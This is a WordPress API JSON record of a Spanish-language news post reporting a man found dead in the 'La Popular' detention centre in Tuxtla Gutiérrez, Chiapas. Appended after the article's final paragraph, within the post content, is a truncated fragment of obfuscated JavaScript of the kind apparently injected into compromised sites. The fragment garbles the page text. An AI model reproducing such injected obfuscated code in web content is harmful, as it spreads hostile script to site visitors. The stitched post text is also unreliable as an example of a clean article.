{"id":23897,"date":"2025-09-10T03:27:22","date_gmt":"2025-09-10T03:27:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23897"},"modified":"2025-09-10T03:27:23","modified_gmt":"2025-09-10T03:27:23","slug":"muer3-hombre-en-la-p0pular","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23897","title":{"rendered":"Muer3 hombre en la p0pular"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23898\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325278-1024x576.jpg\" alt=\"\" class=\"wp-image-23898\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325278-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325278-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325278-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325278-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325278.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23899\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325276-1024x576.jpg\" alt=\"\" class=\"wp-image-23899\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325276-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325276-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325276-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325276.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23900\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325277-1024x576.jpg\" alt=\"\" class=\"wp-image-23900\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325277-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325277-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325277-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325277.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 9 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la tarde fue localizado sin vida un hombre al interior del Centro de Cumplimiento de Sanciones Administrativas conocida como La &#8220;Popular&#8221; ubicado en la Colonia del mismo nombre de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que los custodios se percataron que el sujeto no se mov\u00eda y al revisar se percataron que no contaba con signos vitales.<\/p>\n\n\n\n<p>Inmediatamente activaron el protocolo y acordonaron el \u00e1rea.<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que el sujeto hab\u00eda ingresado el d\u00eda lunes por una falta administrativa y se presume que la causa del fallecimiento fue un supuesto paro card\u00edaco.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 9 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la tarde fue localizado sin vida un hombre al interior del Centro de Cumplimiento de Sanciones Administrativas conocida como La &#8220;Popular&#8221; ubicado en la Colonia del mismo nombre de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que los custodios se percataron que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23900,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-23897","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23897","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23897"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23897\/revisions"}],"predecessor-version":[{"id":23901,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23897\/revisions\/23901"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23900"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23897"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23897"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23897"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}